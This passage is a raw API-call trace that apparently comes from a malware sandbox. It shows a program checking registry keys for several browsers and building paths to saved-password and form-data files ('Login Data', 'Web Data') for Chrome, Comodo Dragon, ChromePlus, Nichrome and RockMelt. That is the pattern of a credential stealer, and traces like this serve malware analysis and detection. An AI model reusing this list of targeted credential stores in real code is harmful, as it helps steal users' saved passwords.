dwFlags=0x0, lpMem=0x6b7028 | out: hHeap=0x6a0000) returned 1 [0125.985] GetProcessHeap () returned 0x6a0000 [0125.985] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x410) returned 0x6b7028 [0125.986] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0125.986] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\ComodoGroup\\IceDragon\\Setup", pszValue="SetupPath", pdwType=0x0, pvData=0x6b7028, pcbData=0x19fba8*=0x104 | out: pdwType=0x0, pvData=0x6b7028, pcbData=0x19fba8*=0x104) returned 0x2 [0125.986] GetProcessHeap () returned 0x6a0000 [0125.987] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b7028 | out: hHeap=0x6a0000) returned 1 [0125.998] GetProcessHeap () returned 0x6a0000 [0125.998] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x410) returned 0x6b7028 [0125.999] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0125.999] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\Apple Computer, Inc.\\Safari", pszValue="InstallDir", pdwType=0x0, pvData=0x6b7028, pcbData=0x19fb9c*=0x104 | out: pdwType=0x0, pvData=0x6b7028, pcbData=0x19fb9c*=0x104) returned 0x2 [0125.999] GetProcessHeap () returned 0x6a0000 [0126.000] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b7028 | out: hHeap=0x6a0000) returned 1 [0126.000] GetProcessHeap () returned 0x6a0000 [0126.000] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x410) returned 0x6b7028 [0126.001] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.001] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\K-Meleon", pszValue="CurrentVersion", pdwType=0x0, pvData=0x6b7028, pcbData=0x19fba4*=0x104 | out: pdwType=0x0, pvData=0x6b7028, pcbData=0x19fba4*=0x104) returned 0x2 [0126.002] GetProcessHeap () returned 0x6a0000 [0126.002] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b7028 | out: hHeap=0x6a0000) returned 1 [0126.002] GetProcessHeap () returned 0x6a0000 [0126.002] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x410) returned 0x6b7028 [0126.003] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.003] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\mozilla.org\\SeaMonkey", pszValue="CurrentVersion", pdwType=0x0, pvData=0x6b7028, pcbData=0x19fb8c*=0x104 | out: pdwType=0x0, pvData=0x6b7028, pcbData=0x19fb8c*=0x104) returned 0x2 [0126.003] GetProcessHeap () returned 0x6a0000 [0126.004] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b7028 | out: hHeap=0x6a0000) returned 1 [0126.004] GetProcessHeap () returned 0x6a0000 [0126.004] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x410) returned 0x6b7028 [0126.005] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.005] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\Mozilla\\SeaMonkey", pszValue="CurrentVersion", pdwType=0x0, pvData=0x6b7028, pcbData=0x19fb8c*=0x104 | out: pdwType=0x0, pvData=0x6b7028, pcbData=0x19fb8c*=0x104) returned 0x2 [0126.005] GetProcessHeap () returned 0x6a0000 [0126.006] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b7028 | out: hHeap=0x6a0000) returned 1 [0126.006] GetProcessHeap () returned 0x6a0000 [0126.006] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x410) returned 0x6b7028 [0126.007] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.007] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\Mozilla\\Flock", pszValue="CurrentVersion", pdwType=0x0, pvData=0x6b7028, pcbData=0x19fba4*=0x104 | out: pdwType=0x0, pvData=0x6b7028, pcbData=0x19fba4*=0x104) returned 0x2 [0126.007] GetProcessHeap () returned 0x6a0000 [0126.008] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b7028 | out: hHeap=0x6a0000) returned 1 [0126.008] GetProcessHeap () returned 0x6a0000 [0126.008] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6b4378 [0126.009] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0126.011] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x6b4378 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0126.017] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.017] StrStrW (lpFirst="C:\\Program Files (x86)", lpSrch="(x86)") returned="(x86)" [0126.018] GetProcessHeap () returned 0x6a0000 [0126.018] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6b8d70 [0126.018] ExpandEnvironmentStringsW (in: lpSrc="%ProgramW6432%", lpDst=0x6b8d70, nSize=0x104 | out: lpDst="C:\\Program Files") returned 0x11 [0126.018] GetProcessHeap () returned 0x6a0000 [0126.018] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f6a) returned 0x6b8f80 [0126.020] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.020] wvsprintfW (in: param_1=0x6b8f80, param_2="%s\\NETGATE\\Black Hawk", arglist=0x19fbb4 | out: param_1="C:\\Program Files\\NETGATE\\Black Hawk") returned 35 [0126.020] GetProcessHeap () returned 0x6a0000 [0126.021] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4a) returned 0x6a7cf8 [0126.021] GetProcessHeap () returned 0x6a0000 [0126.021] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.022] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.022] PathFileExistsW (pszPath="C:\\Program Files\\NETGATE\\Black Hawk") returned 0 [0126.023] GetProcessHeap () returned 0x6a0000 [0126.023] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a7cf8 | out: hHeap=0x6a0000) returned 1 [0126.023] GetProcessHeap () returned 0x6a0000 [0126.024] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8d70 | out: hHeap=0x6a0000) returned 1 [0126.024] GetProcessHeap () returned 0x6a0000 [0126.024] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3fcc) returned 0x6b8d70 [0126.024] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.025] wvsprintfW (in: param_1=0x6b8d70, param_2="%s\\Lunascape\\Lunascape6\\plugins\\{9BDD5314-20A6-4d98-AB30-8325A95771EE}", arglist=0x19fbbc | out: param_1="C:\\Program Files (x86)\\Lunascape\\Lunascape6\\plugins\\{9BDD5314-20A6-4d98-AB30-8325A95771EE}") returned 90 [0126.025] GetProcessHeap () returned 0x6a0000 [0126.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb8) returned 0x6b5990 [0126.025] GetProcessHeap () returned 0x6a0000 [0126.025] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8d70 | out: hHeap=0x6a0000) returned 1 [0126.026] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.026] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Lunascape\\Lunascape6\\plugins\\{9BDD5314-20A6-4d98-AB30-8325A95771EE}") returned 0 [0126.027] GetProcessHeap () returned 0x6a0000 [0126.027] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.044] GetProcessHeap () returned 0x6a0000 [0126.044] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6b8d70 [0126.045] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0126.046] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x6b8d70 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0126.048] GetProcessHeap () returned 0x6a0000 [0126.048] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f84) returned 0x6b8f80 [0126.062] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.063] wvsprintfW (in: param_1=0x6b8f80, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data\\Default\\Login Data") returned 78 [0126.063] GetProcessHeap () returned 0x6a0000 [0126.063] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x6aab98 [0126.063] GetProcessHeap () returned 0x6a0000 [0126.064] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.065] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.065] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data\\Default\\Login Data") returned 0 [0126.081] GetProcessHeap () returned 0x6a0000 [0126.081] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6aab98 | out: hHeap=0x6a0000) returned 1 [0126.081] GetProcessHeap () returned 0x6a0000 [0126.082] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f80) returned 0x6b8f80 [0126.082] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.083] wvsprintfW (in: param_1=0x6b8f80, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data\\Default\\Web Data") returned 76 [0126.084] GetProcessHeap () returned 0x6a0000 [0126.084] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9c) returned 0x6ab0d8 [0126.084] GetProcessHeap () returned 0x6a0000 [0126.084] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.085] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.085] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data\\Default\\Web Data") returned 0 [0126.088] GetProcessHeap () returned 0x6a0000 [0126.089] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ab0d8 | out: hHeap=0x6a0000) returned 1 [0126.089] GetProcessHeap () returned 0x6a0000 [0126.089] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f5e) returned 0x6b8f80 [0126.090] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.091] wvsprintfW (in: param_1=0x6b8f80, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalComodo\\Dragon\\Login Data") returned 59 [0126.091] GetProcessHeap () returned 0x6a0000 [0126.091] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7a) returned 0x6b5990 [0126.091] GetProcessHeap () returned 0x6a0000 [0126.091] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.092] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.093] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalComodo\\Dragon\\Login Data") returned 0 [0126.093] GetProcessHeap () returned 0x6a0000 [0126.093] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.094] GetProcessHeap () returned 0x6a0000 [0126.094] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f6e) returned 0x6b8f80 [0126.094] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.095] wvsprintfW (in: param_1=0x6b8f80, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalComodo\\Dragon\\Default\\Login Data") returned 67 [0126.095] GetProcessHeap () returned 0x6a0000 [0126.095] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8a) returned 0x6b5990 [0126.095] GetProcessHeap () returned 0x6a0000 [0126.096] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.097] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.098] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalComodo\\Dragon\\Default\\Login Data") returned 0 [0126.098] GetProcessHeap () returned 0x6a0000 [0126.099] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.099] GetProcessHeap () returned 0x6a0000 [0126.099] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f84) returned 0x6b8f80 [0126.100] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.101] wvsprintfW (in: param_1=0x6b8f80, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data\\Default\\Login Data") returned 87 [0126.101] GetProcessHeap () returned 0x6a0000 [0126.101] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb2) returned 0x6b5990 [0126.101] GetProcessHeap () returned 0x6a0000 [0126.101] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.102] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.102] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data\\Default\\Login Data") returned 0 [0126.103] GetProcessHeap () returned 0x6a0000 [0126.103] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.103] GetProcessHeap () returned 0x6a0000 [0126.104] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f80) returned 0x6b8f80 [0126.104] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.106] wvsprintfW (in: param_1=0x6b8f80, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data\\Default\\Web Data") returned 85 [0126.106] GetProcessHeap () returned 0x6a0000 [0126.106] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xae) returned 0x6b5990 [0126.106] GetProcessHeap () returned 0x6a0000 [0126.106] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.107] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.107] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data\\Default\\Web Data") returned 0 [0126.108] GetProcessHeap () returned 0x6a0000 [0126.108] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.108] GetProcessHeap () returned 0x6a0000 [0126.108] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f5e) returned 0x6b8f80 [0126.110] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.111] wvsprintfW (in: param_1=0x6b8f80, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalMapleStudio\\ChromePlus\\Login Data") returned 68 [0126.111] GetProcessHeap () returned 0x6a0000 [0126.111] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8c) returned 0x6b5990 [0126.112] GetProcessHeap () returned 0x6a0000 [0126.112] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.113] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.113] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalMapleStudio\\ChromePlus\\Login Data") returned 0 [0126.113] GetProcessHeap () returned 0x6a0000 [0126.114] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.114] GetProcessHeap () returned 0x6a0000 [0126.114] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f6e) returned 0x6b8f80 [0126.115] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.115] wvsprintfW (in: param_1=0x6b8f80, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalMapleStudio\\ChromePlus\\Default\\Login Data") returned 76 [0126.115] GetProcessHeap () returned 0x6a0000 [0126.115] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9c) returned 0x6aa508 [0126.115] GetProcessHeap () returned 0x6a0000 [0126.116] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.119] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.120] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalMapleStudio\\ChromePlus\\Default\\Login Data") returned 0 [0126.120] GetProcessHeap () returned 0x6a0000 [0126.120] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6aa508 | out: hHeap=0x6a0000) returned 1 [0126.120] GetProcessHeap () returned 0x6a0000 [0126.120] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f84) returned 0x6b8f80 [0126.121] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.122] wvsprintfW (in: param_1=0x6b8f80, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data") returned 78 [0126.122] GetProcessHeap () returned 0x6a0000 [0126.122] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x6aa9a0 [0126.122] GetProcessHeap () returned 0x6a0000 [0126.122] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.139] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.139] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data") returned 0 [0126.139] GetProcessHeap () returned 0x6a0000 [0126.140] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6aa9a0 | out: hHeap=0x6a0000) returned 1 [0126.140] GetProcessHeap () returned 0x6a0000 [0126.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f80) returned 0x6b8f80 [0126.141] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.142] wvsprintfW (in: param_1=0x6b8f80, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data") returned 76 [0126.142] GetProcessHeap () returned 0x6a0000 [0126.142] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9c) returned 0x6aae38 [0126.142] GetProcessHeap () returned 0x6a0000 [0126.143] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.144] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.144] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data") returned 0 [0126.144] GetProcessHeap () returned 0x6a0000 [0126.145] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6aae38 | out: hHeap=0x6a0000) returned 1 [0126.145] GetProcessHeap () returned 0x6a0000 [0126.145] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f5e) returned 0x6b8f80 [0126.146] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.147] wvsprintfW (in: param_1=0x6b8f80, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalGoogle\\Chrome\\Login Data") returned 59 [0126.147] GetProcessHeap () returned 0x6a0000 [0126.147] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7a) returned 0x6b5990 [0126.147] GetProcessHeap () returned 0x6a0000 [0126.147] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.148] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.149] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalGoogle\\Chrome\\Login Data") returned 0 [0126.149] GetProcessHeap () returned 0x6a0000 [0126.149] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.149] GetProcessHeap () returned 0x6a0000 [0126.149] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f6e) returned 0x6b8f80 [0126.150] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.151] wvsprintfW (in: param_1=0x6b8f80, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalGoogle\\Chrome\\Default\\Login Data") returned 67 [0126.151] GetProcessHeap () returned 0x6a0000 [0126.151] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8a) returned 0x6b5990 [0126.151] GetProcessHeap () returned 0x6a0000 [0126.151] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.152] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.152] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalGoogle\\Chrome\\Default\\Login Data") returned 0 [0126.152] GetProcessHeap () returned 0x6a0000 [0126.153] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.153] GetProcessHeap () returned 0x6a0000 [0126.153] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f84) returned 0x6b8f80 [0126.154] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.155] wvsprintfW (in: param_1=0x6b8f80, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data\\Default\\Login Data") returned 73 [0126.155] GetProcessHeap () returned 0x6a0000 [0126.155] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x96) returned 0x6b5990 [0126.155] GetProcessHeap () returned 0x6a0000 [0126.156] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.156] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.157] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data\\Default\\Login Data") returned 0 [0126.157] GetProcessHeap () returned 0x6a0000 [0126.157] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.157] GetProcessHeap () returned 0x6a0000 [0126.157] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f80) returned 0x6b8f80 [0126.158] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.159] wvsprintfW (in: param_1=0x6b8f80, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data\\Default\\Web Data") returned 71 [0126.159] GetProcessHeap () returned 0x6a0000 [0126.159] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x92) returned 0x6b5990 [0126.159] GetProcessHeap () returned 0x6a0000 [0126.160] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.161] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.161] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data\\Default\\Web Data") returned 0 [0126.161] GetProcessHeap () returned 0x6a0000 [0126.162] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.162] GetProcessHeap () returned 0x6a0000 [0126.162] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f5e) returned 0x6b8f80 [0126.162] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.163] wvsprintfW (in: param_1=0x6b8f80, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalNichrome\\Login Data") returned 54 [0126.163] GetProcessHeap () returned 0x6a0000 [0126.163] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x6b5990 [0126.163] GetProcessHeap () returned 0x6a0000 [0126.164] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.164] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.165] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalNichrome\\Login Data") returned 0 [0126.165] GetProcessHeap () returned 0x6a0000 [0126.165] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.166] GetProcessHeap () returned 0x6a0000 [0126.166] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f6e) returned 0x6b8f80 [0126.166] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.167] wvsprintfW (in: param_1=0x6b8f80, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalNichrome\\Default\\Login Data") returned 62 [0126.167] GetProcessHeap () returned 0x6a0000 [0126.167] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6b5990 [0126.167] GetProcessHeap () returned 0x6a0000 [0126.168] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.169] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.169] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalNichrome\\Default\\Login Data") returned 0 [0126.169] GetProcessHeap () returned 0x6a0000 [0126.169] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.169] GetProcessHeap () returned 0x6a0000 [0126.170] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f84) returned 0x6b8f80 [0126.170] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.171] wvsprintfW (in: param_1=0x6b8f80, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\RockMelt\\User Data\\Default\\Login Data") returned 73 [0126.171] GetProcessHeap () returned 0x6a0000 [0126.171] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x96) returned 0x6b5990 [0126.171] GetProcessHeap () returned 0x6a0000 [0126.172] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.173] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.173] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\RockMelt\\User Data\\Default\\Login Data") returned 0 [0126.173] GetProcessHeap () returned 0x6a0000 [0126.173] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.174] GetProcessHeap () returned 0x6a0000 [0126.177] 